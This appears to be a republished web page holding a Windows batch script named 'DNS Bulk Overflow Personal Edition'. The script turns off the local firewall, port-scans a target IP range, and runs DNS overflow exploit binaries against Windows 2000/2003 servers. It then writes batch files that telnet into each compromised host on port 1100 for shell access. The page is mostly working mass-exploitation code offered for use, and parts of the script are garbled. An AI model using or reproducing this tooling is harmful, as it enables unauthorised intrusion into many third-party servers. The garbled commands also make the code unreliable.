DNS Bulk overflow Batch code _dos/bat

Source: Internet
Author: User
Tags eol goto

Copy Code code as follows:

@shift 1
@ setlocal
@ CLS
@ Color A
@ Title DNS Bulk Overflow Personal Edition
@echo ================================================================================
@echo DNS Bulk Overflow Personal Edition
@echo by amxking
@echo 1. Enter the IP segment format you want to overflow: XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX
@echo =================================================================================
@ set/p input=1. Enter the IP segment you want to overflow:
@ echo%input%>>ip.txt
@ net stop SharedAccess
@ net start server
@echo ================================================================================
@set/P c= Please select the scanning mode: (1 for SYN tcp,2):
@if "%c%" = = "2" goto SYN
@if "%c%" = = "1" Goto TCP

: SYN
@for/F "eol= tokens=1,2 delims="%%i in (ip.txt) do%myfiles%\s syn%%i%%j 53/save
@ Goto IP

: TCP
@for/F "eol= tokens=1,2 delims="%%i in (ip.txt) do%myfiles%\s tcp%%i%%j 1000/save

@ Goto IP

: IP
@for/F "eol=-Tokens=1 delims="%%i in (result.txt) do echo%%i>>s1.txt
@for/F "eol=p Tokens=1 delims="%%i in (s1.txt) do echo%%i>>s2.txt
@for/F "eol=s Tokens=1 delims="%%i in (s2.txt) do echo%%i>>s.txt

@del Ip.txt
@del S1.txt
@del S2.txt
@del Result.txt
@echo =================================================================================
@echo Waiting for overflow ..... When appearing similar to 203.80.19.6 1077:vulnerability Os:window 2003
@echo IP 1077 is the system type for IP 203.80.19.6 that can be overrun
@echo Save the overflow to boot.txt save format: IP port system For example 58.34.125.200 1029 2003
@echo =================================================================================
@ for/f "eol= tokens=1 delims="%%i in (s.txt) do%myfiles%\dns-s%%i
@echo =================================================================================
@echo Save the overflow to boot.txt save format: IP port system For example 58.34.125.200 1029 2003
@echo =================================================================================
@pause

@ for/f "eol= tokens=1,2 delims="%%i in (boot.txt) do%myfiles%\dns-t2000all%%i

@for/F "eol= tokens=1,2 delims="%%i in (boot.txt) do%myfiles%\dns-t2003eng%%i
@goto Yichu
: Yichu
@for/F "eol=s tokens=1 delims="%%i in (boot.txt) do echo telnet%%i 1100>>3.txt
@for/F "eol= tokens=1 delims="%%i in (3.txt) do echo%%i>>%%i.bat
@del S.txt
@del A.txt
@del 3.txt

@echo =================================================================================
@echo run the generated batch waiting for overflow .....
@echo =================================================================================
@pause

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.